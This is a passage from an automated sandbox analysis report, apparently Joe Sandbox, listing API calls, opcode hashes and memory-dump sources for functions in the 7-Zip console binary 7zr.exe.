                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologfputcfputsfree
                        • String ID:
                        • API String ID: 195749403-0
                        • Opcode ID: 3803de63cc1d291764a56bb5afafdfd361c346d1d06190f8bd0173125a36f55f
                        • Instruction ID: 61f647006166d10d88382bf643061ba468fd9e98fc55177415a8401a72eddbcf
                        • Opcode Fuzzy Hash: 3803de63cc1d291764a56bb5afafdfd361c346d1d06190f8bd0173125a36f55f
                        • Instruction Fuzzy Hash: 32F0BE32A04504CBCB16BB94E4027EEBBB0EF04354F00446AE501A7491CB346996CB88
                        APIs
                        • SysAllocStringLen.OLEAUT32(?,?), ref: 0038952C
                        • _CxxThrowException.MSVCRT(?,004355B8), ref: 0038954A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AllocExceptionStringThrow
                        • String ID:
                        • API String ID: 3773818493-0
                        • Opcode ID: bdf195fbdd28357770525e6f92e55416bd7b6efd7e11f09e0972184512324f31
                        • Instruction ID: cd6f91e699c130f82d32383aaec7b344601402d607e534926dc6d24bd2b726e8
                        • Opcode Fuzzy Hash: bdf195fbdd28357770525e6f92e55416bd7b6efd7e11f09e0972184512324f31
                        • Instruction Fuzzy Hash: C2F06D72710304EFC721EFA9D885E9A7BECEF05380B40847AF908CB210EB74E8408794
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$fputc
                        • String ID:
                        • API String ID: 1185151155-0
                        • Opcode ID: 3f8f4290ef7fb4f6a48957a70189589421f1ecccae5c77bb108482974d2b9570
                        • Instruction ID: 865b18e864bc6b1ed86e29eac3e23ef927fc3b8685aa25b38c136f63b786b349
                        • Opcode Fuzzy Hash: 3f8f4290ef7fb4f6a48957a70189589421f1ecccae5c77bb108482974d2b9570
                        • Instruction Fuzzy Hash: 2AE08C372091146FD6272B48FC028986799DB8A761326013BE74093264AF532D1A5EA8
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast_beginthreadex
                        • String ID:
                        • API String ID: 4034172046-0
                        • Opcode ID: 43ecb121248ed7ff34a2a748da561fdc3757bf6fcecfa61116d8a1d8de362b5f
                        • Instruction ID: 1e9887aae40d3a74d19d4569d55d04a5c10184fc4e323c6c294bb46519f12682
                        • Opcode Fuzzy Hash: 43ecb121248ed7ff34a2a748da561fdc3757bf6fcecfa61116d8a1d8de362b5f
                        • Instruction Fuzzy Hash: B2E086B22443016AE3109B508C01FA772D89B90740F40447EBA45C6180E660CD41C3A9
                        APIs
                        • GetCurrentProcess.KERNEL32(?,?,00389C6E), ref: 00389C52
                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00389C59
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: Process$AffinityCurrentMask
                        • String ID:
                        • API String ID: 1231390398-0
                        • Opcode ID: 8cccf9b06049f1f43ba52cb0c805a67f0888e219669f4b1049178c5039ebcba0
                        • Instruction ID: 7407da261739199046519fdc35d98e36f5e7e0f27c306fd189e25c5316a1bee1
                        • Opcode Fuzzy Hash: 8cccf9b06049f1f43ba52cb0c805a67f0888e219669f4b1049178c5039ebcba0
                        • Instruction Fuzzy Hash: 5DB092B2500100EBCE209BE09D8CC1A3B2CEE042013404664B109C2010C636C0468B6C
                        APIs
                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 0038B843
                        • GetLastError.KERNEL32 ref: 0038B8AA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLastmemcpy
                        • String ID:
                        • API String ID: 2523627151-0
                        • Opcode ID: bb286f34a476eb3b8d38f16bcacb9a0d88e04b76db9e8e836b061e440f2adac7
                        • Instruction ID: 8740c2350cc21b4cd5996ac95d3c93ad05f643ff6f7d4f82add0c4c75b19782d
                        • Opcode Fuzzy Hash: bb286f34a476eb3b8d38f16bcacb9a0d88e04b76db9e8e836b061e440f2adac7
                        • Instruction Fuzzy Hash: D8817D31600746DFDB76EE25C980A6AF7F6BF84314F1549AEE84687A40E730F941CB50
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrowmalloc
                        • String ID:
                        • API String ID: 2436765578-0
                        • Opcode ID: 5a00e31ceaa56f262474d4a34240f889eaad4505962e4242c3d140ba02ba3418
                        • Instruction ID: 64b95a59f7cb67c125bed1a31acc8c72d2d05e89a187079259cc6703694f58f6
                        • Opcode Fuzzy Hash: 5a00e31ceaa56f262474d4a34240f889eaad4505962e4242c3d140ba02ba3418
                        • Instruction Fuzzy Hash: 30E08C3010434CAACF116FA0D844BD83B6C5B00359F40A066F80C8E101C274E6D68B48
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: e6a2a3ce98e9a9f5c654b94e67333290102f54411717f30f3543d9897c50ff91
                        • Instruction ID: 6c0b17a32bbf728d98bf54887f03dfa3c17b7089ef92c9de2c799057fd98140d
                        • Opcode Fuzzy Hash: e6a2a3ce98e9a9f5c654b94e67333290102f54411717f30f3543d9897c50ff91
                        • Instruction Fuzzy Hash: FA527B30904289DFDF12CFA8C595BAEFBB5AF49304F28409DE845EB291CB759E45CB21
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: f9caf10f3d032bfd992f145289ad8623affbe8426e1a8a8cb95ea5d419fc08c8
                        • Instruction ID: fa7b2c43e94590a70351b721d175d2a7f156c39cfb147a5fd6f9cf2a450d8e3f
                        • Opcode Fuzzy Hash: f9caf10f3d032bfd992f145289ad8623affbe8426e1a8a8cb95ea5d419fc08c8
                        • Instruction Fuzzy Hash: 4DF1FF71906785DFCF23DF64C4A2AAABBF1BF15304F56486EE48A8B612D730AD44CB11
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 8e319525697105a71140be42ad11cdd445423d8777d550c1fee783d059020387
                        • Instruction ID: 5388de127b3050f9426c844873f9196f148377518fbf23772c4e788200fae774
                        • Opcode Fuzzy Hash: 8e319525697105a71140be42ad11cdd445423d8777d550c1fee783d059020387
                        • Instruction Fuzzy Hash: ADD19A76A00745AFDF2ACFA8D880BEEBBB1BF48304F10452EE455A7751D775A884CB90
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CCF96
                          • Part of subcall function 003D1511: __EH_prolog.LIBCMT ref: 003D1516
                          • Part of subcall function 003D1511: _CxxThrowException.MSVCRT(?,0043D480), ref: 003D1561
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrow
                        • String ID:
                        • API String ID: 2366012087-0
                        • Opcode ID: ce7439993fea43a4a29cce6d0d7866b96189b8f0b1aeec4f24cf4bed276593d6
                        • Instruction ID: 54d9f8824ee6d4a04fb97d566b33710fb66b67468d99479ec0fdcae807fd7544
                        • Opcode Fuzzy Hash: ce7439993fea43a4a29cce6d0d7866b96189b8f0b1aeec4f24cf4bed276593d6
                        • Instruction Fuzzy Hash: F4511B71900289DFCB12DFA8C888FAEBBB4AF49304F1444AEF45AD7242C7759E45DB21
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: ccd748b234d25d2932b66d04897b392f6451f61c9597d8d0d4c93d68f216c6a4
                        • Instruction ID: 13b2fc9da37c40030990474fbc669e17ba19e7ac0e4f51335f46ed7260a7f9a9
                        • Opcode Fuzzy Hash: ccd748b234d25d2932b66d04897b392f6451f61c9597d8d0d4c93d68f216c6a4
                        • Instruction Fuzzy Hash: CD515D74A00706DFCB15CF64C8909BAFBB2FF89348B10496DD692ABB51D731A905CF90
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: b7abf60b2877a388fb13058a127b83bbb76c92b379f0d2d1a7245a823857fe7d
                        • Instruction ID: 4b4ebe2c6d051452e8b8c584d8a40593bcd6accf39288aaddc221f1d9df2e876
                        • Opcode Fuzzy Hash: b7abf60b2877a388fb13058a127b83bbb76c92b379f0d2d1a7245a823857fe7d
                        • Instruction Fuzzy Hash: 3841D270A00B4ADFDB26CF64C498F6ABBA0BF04318F158A6DD456C7A91C370ED81CB81
                        APIs
                        • __EH_prolog.LIBCMT ref: 00394255
                          • Part of subcall function 0039440B: __EH_prolog.LIBCMT ref: 00394410
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrowmalloc
                        • String ID:
                        • API String ID: 3744649731-0
                        • Opcode ID: dd00aa67af5dceee11e82a147e8124bc78e0ec30be46f18191450558712cc19e
                        • Instruction ID: efe37403f48419a8f10d0dfbaf57e2105c5fcaa7c7b9c2f03fa60819c6c729d7
                        • Opcode Fuzzy Hash: dd00aa67af5dceee11e82a147e8124bc78e0ec30be46f18191450558712cc19e
                        • Instruction Fuzzy Hash: 6751F8B0901744CFC726DF69C1846DAFBF0BF19304F9488AEC49A9B752D7B4A608CB65
                        APIs
                        • __EH_prolog.LIBCMT ref: 003AD0E6
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionH_prologThrowmalloc
                        • String ID:
                        • API String ID: 3978722251-0
                        • Opcode ID: 6eefdc62734295b74895b99ba4d09caeb0c294bb90793f025b604d5e419879cc
                        • Instruction ID: ce0f017e66878d9e644429ba9a040646a56a01eea57e585272a69a1badd682a6
                        • Opcode Fuzzy Hash: 6eefdc62734295b74895b99ba4d09caeb0c294bb90793f025b604d5e419879cc
                        • Instruction Fuzzy Hash: 7341B471A002159FCB16DBA8C8457AEBBB8FF46310F254499E446EB682CB709D05C790
                        APIs
                        • __EH_prolog.LIBCMT ref: 00397FCA
                          • Part of subcall function 0038950D: SysAllocStringLen.OLEAUT32(?,?), ref: 0038952C
                          • Part of subcall function 0038950D: _CxxThrowException.MSVCRT(?,004355B8), ref: 0038954A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AllocExceptionH_prologStringThrow
                        • String ID:
                        • API String ID: 1940201546-0
                        • Opcode ID: 2350d7aecb7995f244e7799afb5acee05e054b24be0c73a9b990ca9b2012dda4
                        • Instruction ID: 46445161bdac968d87283d8b2b4d20f4489357cff5ed5b55493cfec2f554391e
                        • Opcode Fuzzy Hash: 2350d7aecb7995f244e7799afb5acee05e054b24be0c73a9b990ca9b2012dda4
                        • Instruction Fuzzy Hash: FB31C372820209EADF17AFA4C8559FE7774FF96310F45406AE002B7761EF359A08D751
                        APIs
                        • __EH_prolog.LIBCMT ref: 003BADBC
                          • Part of subcall function 003BAD29: __EH_prolog.LIBCMT ref: 003BAD2E
                          • Part of subcall function 003BAF2D: __EH_prolog.LIBCMT ref: 003BAF32
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: e7114936a0dae67d215f7521308692c8b97c1fdc314f7ef0b44a7bdeacf832ce
                        • Instruction ID: 970f2ee490f15b63f6eb973c1063f7291cf5f5387f8e9b8a04858ef29765640e
                        • Opcode Fuzzy Hash: e7114936a0dae67d215f7521308692c8b97c1fdc314f7ef0b44a7bdeacf832ce
                        • Instruction Fuzzy Hash: 8941C97144ABC0DEC326DF7881656CAFFE06F25204F94C99EC0EA47A52D670A60CC76A
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 2322b3a80572976a123368ed9e2683c1bef1f9635b220edb896620fb5c232fc6
                        • Instruction ID: 46ea288c082f892f395e015dc7ca9c5f44f4ecbbd24a889c02c7cac400393826
                        • Opcode Fuzzy Hash: 2322b3a80572976a123368ed9e2683c1bef1f9635b220edb896620fb5c232fc6
                        • Instruction Fuzzy Hash: 6B312174D00209DFCB19EF95C9918EEFBB9FF96364B10811EE4266B651C7309D51CBA0
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A98F7
                          • Part of subcall function 003A9987: __EH_prolog.LIBCMT ref: 003A998C
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 8816aeb79269a61bfb95d9001f207ab2dc8246de4823f61e61863640967122d3
                        • Instruction ID: f5caec88631c043eafae3a3d703f5142f8b4fcb83855df6efa26800d6af5a7d1
                        • Opcode Fuzzy Hash: 8816aeb79269a61bfb95d9001f207ab2dc8246de4823f61e61863640967122d3
                        • Instruction Fuzzy Hash: DF117C35700205AFCB14CF59C884BABB3A9FF8A350F15855DE956EB251CB35EC00CB10
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A021F
                          • Part of subcall function 00393D66: __EH_prolog.LIBCMT ref: 00393D6B
                          • Part of subcall function 00393D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D7D
                          • Part of subcall function 00393D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D94
                          • Part of subcall function 00393D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00393DB6
                          • Part of subcall function 00393D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DCB
                          • Part of subcall function 00393D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DD5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID:
                        • API String ID: 1532160333-0
                        • Opcode ID: 9d4ce7651281f6fcd7b28ebabc8585b10ac3d9a0c9e92c5aa7272db7d48da867
                        • Instruction ID: 1e53a6769ca8fc08c74d823c0d4308e6bd182330b9ce25678c5e0b9f9a7b7c81
                        • Opcode Fuzzy Hash: 9d4ce7651281f6fcd7b28ebabc8585b10ac3d9a0c9e92c5aa7272db7d48da867
                        • Instruction Fuzzy Hash: 8D2139B1946B90CFC321DF6A82D0686FFF4BB19604B94996FC0DA83B12C374A548CF55
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A1C74
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: c437956e4333ad7976f060d95f1868441288eae999e0df882ab6cd73fc291f97
                        • Instruction ID: 663b742bb9299d5ea77b45c87421768fec7c14ab98627b503f957e4302c6fd5d
                        • Opcode Fuzzy Hash: c437956e4333ad7976f060d95f1868441288eae999e0df882ab6cd73fc291f97
                        • Instruction Fuzzy Hash: 7A11AD31A003049BCF1BFBE4D952BEEBB79EF05364F0000A9E8426B192DB656D4AC794
                        APIs
                        • __EH_prolog.LIBCMT ref: 00397E5F
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                          • Part of subcall function 0038757D: GetLastError.KERNEL32(0038D14C), ref: 0038757D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ErrorLastfree
                        • String ID:
                        • API String ID: 683690243-0
                        • Opcode ID: 0567ce7bea20021aec84b1a20ebc0127d00c596e17cc4547800d68202dc38696
                        • Instruction ID: 5dec496188139c52a957934c88534a7f5c0b9834ace7d314002f62d77b9b9c7d
                        • Opcode Fuzzy Hash: 0567ce7bea20021aec84b1a20ebc0127d00c596e17cc4547800d68202dc38696
                        • Instruction Fuzzy Hash: B701A572A457009FC722FF74D4929DB7BB5EF45350B10456EE84357592CB346909CB50
                        APIs
